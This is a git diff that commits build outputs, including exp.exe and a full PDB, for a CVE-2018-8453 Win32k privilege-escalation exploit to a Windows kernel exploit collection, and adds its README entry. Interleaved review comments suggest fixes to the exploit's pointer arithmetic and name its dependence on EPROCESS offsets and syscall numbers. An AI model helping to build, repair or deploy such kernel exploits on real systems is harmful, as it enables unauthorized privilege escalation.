+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp_x64_palette_paddress\x64\Release\exp.exe
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp_x64_palette_paddress\x64\Release\exp.pdb (Full PDB)
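Review bot: the seven warnings recorded here are real defects, not noise: the C4311/C4302 pointer truncations at exp.cpp(93) are the `(unsigned int)pIsMenu - (unsigned int)hUser32` cast in FindHMValidateHandle, and the C4477 warnings at lines 179 and 266 are `printf("%p", ULONG64)`; fix them in exp.cpp (ULONG_PTR arithmetic, `%llx`) instead of committing the log. The `exp.pdb (Full PDB)` line also means a full symbol file for the exploit is being shipped next to exp.exe.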
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.obj b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.obj
new file mode 100644
index 0000000..b2617e6
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.pch b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.pch
new file mode 100644
index 0000000..77c1677
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.pch differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..a1c88d9
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..795dca7
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..5ceccd0
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..e2c03c0
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Release|x64|C:\Users\ze0r\Desktop\exp_x64_palette_paddress\|
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.write.1u.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.write.1u.tlog
new file mode 100644
index 0000000..7bd5eba
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.write.1u.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..6d501e1
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..0fb6cba
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..6810e25
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/stdafx.obj b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/stdafx.obj
new file mode 100644
index 0000000..37357b1
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/stdafx.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/vc140.pdb b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/vc140.pdb
new file mode 100644
index 0000000..03c0b33
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/vc140.pdb differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-736257b7/EXP-4dbe2bb1.ipch b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-736257b7/EXP-4dbe2bb1.ipch
new file mode 100644
index 0000000..5227153
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-736257b7/EXP-4dbe2bb1.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4c98b977.ipch b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4c98b977.ipch
new file mode 100644
index 0000000..070307e
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4c98b977.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch
new file mode 100644
index 0000000..5f7d0c6
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-c8e60a99.ipch b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-c8e60a99.ipch
new file mode 100644
index 0000000..532b888
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-c8e60a99.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/x64/Release/exp.exe b/CVE-2018-8453/exp_x64_palette_paddress/x64/Release/exp.exe
new file mode 100644
index 0000000..aa974d3
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/x64/Release/exp.exe differ
diff --git a/README.md b/README.md
index 8b9317d..bcfe7eb 100644
--- a/README.md
+++ b/README.md
@@ -11,8 +11,9 @@ windows-kernel-exploits
- [MS17-017](./MS17-017) [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
- [CVE-2017-8464](./CVE-2017-8464) [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008)
- [CVE-2017-0213](./CVE-2017-0213) [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
-- [CVE-2018-0833](./CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
-- [CVE-2018-8120](./CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
+- [CVE-2018-0833](./CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
+- [CVE-2018-8120](./CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
+- [CVE-2018-8453](./CVE-2018-8453) [Win32k Elevation of Privilege Vulnerability] (Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers)
- [MS17-010](./MS17-010) [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
- [MS16-135](./MS16-135) [KB3199135] [Windows Kernel Mode Drivers] (2016)
- [MS16-111](./MS16-111) [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)
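Review bot: the CVE-2018-0833 and CVE-2018-8120 lines are removed and re-added with no visible change, which looks like a line-ending or trailing-whitespace difference; keep the diff to the one new line. The new CVE-2018-8453 entry copies the advisory's full platform list, but the exploit directories added in this patch are x64-only and carry build-specific EPROCESS offsets, KernelCallbackTable indices and win32k syscall numbers, so the entry should name the builds the code was actually tested on, as the neighbouring entries do.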